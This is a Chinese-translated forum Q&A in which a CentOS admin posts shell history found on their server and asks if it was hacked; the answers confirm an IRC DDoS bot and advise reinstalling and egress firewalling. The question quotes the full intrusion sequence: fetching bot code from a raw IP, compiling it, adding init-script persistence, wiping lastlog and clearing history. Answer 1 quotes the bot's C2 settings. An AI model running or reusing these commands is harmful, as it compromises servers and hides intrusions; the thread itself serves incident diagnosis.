我的网络服务器是否受到威胁？

Question

我的网络服务器是否受到威胁？

我们今天使用 Putty 远程登录到我们的 CentOS 服务器，在使用向上箭头浏览之前的命令时，偶然发现了以下内容：

unset HISTFILE
mkdir /usr/lib/tmp 
cd /usr/lib/tmp 
wget http://188.72.217.17/mzb.c -o /dev/null
wget http://188.72.217.17/windef.h -o /dev/null
gcc mzb.c -o /bin/bot -lpthread
rm -rf mzb.c
rm -rf windef.h
wget http://188.72.217.17/botsupport.sh -o /dev/null
chmod +x botsupport.sh
mv botsupport.sh /etc/init.d/httpd2
cat /etc/init.d/network > /etc/init.d/network.bp
echo \#\!/bin/sh  >  /etc/init.d/network
echo nohup /etc/init.d/httpd2 \& >> /etc/init.d/network
cat /etc/init.d/network.bp >> /etc/init.d/network
cat /dev/null > /var/log/lastlog
history -c
nohup /etc/init.d/httpd2 &

Run Code Online (Sandbox Code Playgroud)

（为了清晰起见，用换行符替换了&&）

我从来没有运行过这些命令，永远！这是怎么发生的，我的服务器被黑客入侵了吗？我立即更改了我的 root 密码，但希望有人能对这里发生的事情有所了解。

我看到源代码中提到了 ddos bots，我和我的同事都非常担心！

提前致谢！

Answer 1

Roo*_*ook 7

是的，你被黑了。黑客安装了一个 IRC 后门，你正在连接到这个 IRC 服务器：

const  int port      = 1254; 
const char channel[] = "#test";
const char password[]= "pass";
const char server[]  = "heathen.cc";

Run Code Online (Sandbox Code Playgroud)

bot herder 可以在您的服务器上执行任何命令。我建议关闭服务器并立即重新安装。该僵尸程序具有一些 DDoS 攻击功能，DNS 泛洪、同步泛洪和 ICMP 泛洪。它也适用于非常酷的 Windows。有一个非常古老的传播模块可以感染 myDoom。这看起来像一些旧的恶意软件。

这就是为什么您应该始终拥有阻止出口流量的防火墙规则。正确配置的防火墙会阻止这种攻击，使其无法与它的命令和控制 irc 服务器通信。 (3认同)
“这看起来像一些旧的恶意软件。” - 好在他在他的 Linux 机器上运行防病毒软件来检测这个。 (3认同)

Answer 2

Pek*_*kka 6

无论如何，答案是肯定的，您的服务器正在或已经被入侵。

您应该立即切断与服务器的 Internet 连接，进行完整备份（请记住，其他文件也可能受到威胁），然后重新安装。

此外，您可能希望通知运行僵尸网络（或其他任何网络）的 IP 的所有者。这是RIPE whois 数据。

归档时间：	16 年前
查看次数：	907 次
最近记录：	16 年前